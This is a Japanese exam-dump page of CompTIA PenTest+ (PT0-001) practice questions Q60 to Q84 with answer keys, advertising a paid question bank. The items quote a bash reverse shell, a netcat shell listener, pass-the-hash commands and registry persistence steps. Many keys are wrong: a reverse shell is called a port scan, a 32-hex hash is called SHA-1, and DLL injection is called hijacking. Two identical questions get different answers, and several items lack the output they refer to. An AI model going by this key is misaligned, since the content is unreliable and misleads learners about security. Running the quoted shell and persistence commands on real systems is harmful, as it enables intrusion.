最新 [2023年10月21日]PT0-001試験問題には有効なPT0-001問題集PDF [Q60-Q84]

Share

最新 [2023年10月21日]PT0-001試験問題には有効なPT0-001問題集PDF

PT0-001練習テスト問題解答は更新された295問があります


CompTIA PT0-001試験は、ネットワーキング、ツール、およびテクノロジーを含むサイバーセキュリティについて、中級レベルの知識や経験を持つ個人を対象に設計されています。倫理的ハッカー、脆弱性テスター、およびセキュリティアナリストなど、ペンテストに関するキャリアをさらに発展させたいプロフェッショナルは、この認定試験を受ける必要があります。PT0-001試験は、ネットワークやシステムの脆弱性をテストおよび検証するスキルを開発したい人や、ペネトレーションテスターが自分のスキルを認証したい人にとって価値があります。

 

質問 # 60
Which of the following is the reason why a penetration tester would run the chkconfig --del servicenamecommand at the end of an engagement?

  • A. To remove the persistence
  • B. To check for persistence
  • C. To report persistence
  • D. To enable persistence

正解:A


質問 # 61
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used m this attack?

  • A. Principle of social proof
  • B. Principle of fear
  • C. Principle of scarcity
  • D. Principle of authority
  • E. Principle of likeness

正解:D


質問 # 62
During an internal network penetration test the tester is able to compromise a Windows system and recover the NTLM hash for a local wrltsrnAdrain account Attempting to recover the plaintext password by cracking the hash has proved to be unsuccessful, and the tester has decided to try a pass-the-hash attack to see if the credentials are reused on other in-scope systems Using the Medusa tool the tester attempts to authenticate to a list of systems, including the originally compromised host, with no success Given the output below:

Which of the following Medusa commands would potentially provide better results?

  • A. #medusa -h hosts.txt -U usera.txt -P hashes, txt -M smbnt. -m GROP:LOCAL -O out.txt -m PASS:HASH
  • B. #medusa -H hosts.txt -u WrkStnAdmin -p aa3b435b51404eeaa3b435b51404ee:4e63c1b137e274dda214154b349fe316 -M smbnt -m GROUP:DOMAIN -o out.txt
  • C. #medusa -H hosts.txt -U users, txt -P hashes, txt -M smbnt -m PASS:HASH -o out. txt
  • D. #medusa -H hosts.txt -C creds.txt -M mssq1 -m GROUP: DOMAIN -o out.txt

正解:A


質問 # 63
A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command:
for m in {1..254..1};do ping -c 1 192.168.101.$m; done
Which of the following BEST describes the result of running this command?

  • A. Port scan
  • B. Service enumeration
  • C. Denial of service
  • D. Live host identification

正解:D

解説:
Explanation/Reference:


質問 # 64
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?

  • A. Take the target offline so it cannot be exploited by an attacker.
  • B. Complete all findings, and then submit them to the client.
  • C. Disable the network port of the affected service.
  • D. Promptly alert the client with details of the finding.

正解:A


質問 # 65
A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

  • A. responder
  • B. arpspoof
  • C. burpsuite
  • D. nmap

正解:D

解説:
Explanation/Reference: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/


質問 # 66
A penetration tester runs a script that queries the domain controller for user service principal names. Which of the following techniques is MOST likely being attempted?

  • A. Cpassword
  • B. LSASS credential extraction
  • C. Cleartext credentials in LDAP
  • D. Kerberoasting

正解:D


質問 # 67
A penetration test was performed by an on-staff technicians junior technician. During the test, the technician discovered the application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

  • A. Request that management create an RFP to begin a formal engagement with a professional penetration testing company.
  • B. Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof-of-concept to management.
  • C. Notify the development team of the discovery and suggest that input validation be implemented on the web application's SQL query strings.
  • D. Document Ihe findtngs with an executive summary, recommendations, and screenshots of the web apphcation disclosure.

正解:D


質問 # 68
A penetration testet is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network The (ester is monitoring the correct channel tor the identified network but has been unsuccessful in capturing a handshake Given this scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

  • A. Karma attack
  • B. Deauthentication attack
  • C. Fragmentation attack
  • D. SSID broadcast flood

正解:B


質問 # 69
The following line was found in an exploited machine's history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?

  • A. Performs a port scan.
  • B. Grabs the web server's banner.
  • C. Removes error logs for the supplied IP.
  • D. Redirects a TTY to a remote system.

正解:A

解説:
Explanation/Reference: https://hackernoon.com/reverse-shell-cf154dfee6bd


質問 # 70
Which of the following tools is used to perform a credential brute force attack?

  • A. John the Ripper
  • B. Peach
  • C. Hydra
  • D. Hashcat

正解:A

解説:
Explanation
Reference
https://www.greycampus.com/blog/information-security/brute-force-attacks-prominent-tools-totackle- such-attacks


質問 # 71
A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

  • A. nc -l -p 4444 /bin/bash
  • B. nc -p 4444 /bin/bash
  • C. nc -lp 4444 -e /bin/bash
  • D. nc -vp 4444 /bin/bash

正解:A


質問 # 72
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

  • A. Stored XSS
  • B. Expired certificate
  • C. Fill path disclosure
  • D. Clickjacking

正解:A


質問 # 73
Given the following Python script:

Which of the following actions will it perform?

  • A. Reverse shell
  • B. Port scanner
  • C. ARP spoofing
  • D. Banner grabbing

正解:C


質問 # 74
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

  • A. Wireshark
  • B. SET
  • C. Shodan
  • D. Dynamo
  • E. Maltego
  • F. BeEF

正解:C、E

解説:
Explanation/Reference:
References: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/#gref


質問 # 75
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

  • A. dsquery user -inactive 3
  • B. dsuser -name -account -limit 3
  • C. dsrm -users "DN=company.com; OU=hq CN=users"
  • D. dsquery -o -rdn -limit 21

正解:D


質問 # 76
A penetration tester successfully exploits a DM2 server that appears to be listening on an outbound port The penetration tester wishes to forward that traffic back to a device Which of the following are the BEST tools to use few this purpose? (Select TWO)

  • A. Netcat
  • B. Tcpdump
  • C. Wiresrtark
  • D. Cain and Abel
  • E. SSH
  • F. Nmap

正解:C、E


質問 # 77
If a security consultant comes across a password hash that resembles the following:
b117525b345470c29ca3d8ac0b556ba8
Which of the following formats is the correct hash type?

  • A. SHA-1
  • B. NetNTLMv1
  • C. NTLM
  • D. Kerberos

正解:A


質問 # 78
A penetration tester executes the following commands:

Which of the following is a local host vulnerability that the attacker is exploiting?

  • A. Shell escape
  • B. Application whitelisting
  • C. Insecure file permissions
  • D. Writable service

正解:C

解説:
Explanation/Reference: https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#john-the-ripper---jtr


質問 # 79
A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)

  • A. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.
  • B. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.
  • C. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com.
  • D. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.
  • E. Create a schedule task to call C:\windows\system32\drivers\etc\hosts.
  • F. Create a fake service in Windows called RTAudio to execute manually.

正解:A、B


質問 # 80
A penetration tester identifies prebuilt exploit code containing Windows imports for VirtualAllocEx and LoadLibraryA functions. Which of the following techniques is the exploit code using?

  • A. DLL hijacking
  • B. DLL function hooking
  • C. DLL sideloading
  • D. DLL injection

正解:A


質問 # 81
A penetration tester executes the following commands:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy
C:\> accesschk.exe -w -s -q -u Users C:\Windows
rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing
C:\Windows\Tracing\jtr.exe
jtr version 3.2...
jtr>
Which of the following is a local host vulnerability that the attacker is exploiting?

  • A. Application Whitelisting
  • B. Shell escape
  • C. Insecure file permissions
  • D. Writable service

正解:C


質問 # 82
Which of the following actions BEST matches a script kiddie's threat actor?

  • A. Exfiltrate network diagrams to perform lateral movement.
  • B. Steal credit cards from the database and sell them in the deep web.
  • C. Deface the website of a company in search of retribution.
  • D. Install a rootkit to maintain access to the corporate network.

正解:B

解説:
Explanation/Reference: https://www.skyetechnologies.com/2020/08/20/meet-the-threat-actors-part-1-script-kiddies/


質問 # 83
A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)

  • A. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.
  • B. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.
  • C. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.
  • D. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com.
  • E. Create a schedule task to call C:\windows\system32\drivers\etc\hosts.
  • F. Create a fake service in Windows called RTAudio to execute manually.

正解:A、C


質問 # 84
......


PT0-001としても知られるComptia Pentest+認定試験は、浸透テスト、脆弱性評価、脆弱性管理を実施する専門家の業界認識認証です。認定試験は、効率的な浸透テストを計画および実施するために必要なスキルと知識を検証し、脆弱性を特定し、結果を分析し、修復の推奨事項を提供するために必要なスキルと知識を検証するように設計されています。 Comptia Pentest+認定試験には、サイバーセキュリティの専門家が、さまざまなネットワークアーキテクチャでセキュリティ評価を実行し、脆弱性を特定し、それらに対処するためのソリューションを推奨するために必要な実用的なスキルを装備しています。

 

PT0-001問題集で合格確定させる練習には295問があります:https://jp.fast2test.com/PT0-001-premium-file.html


弊社を連絡する

我々は12時間以内ですべてのお問い合わせを答えます。

我々の働いている時間: ( GMT 0:00-15:00 )
月曜日から土曜日まで

サポート: 現在連絡 

English Deutsch 繁体中文 한국어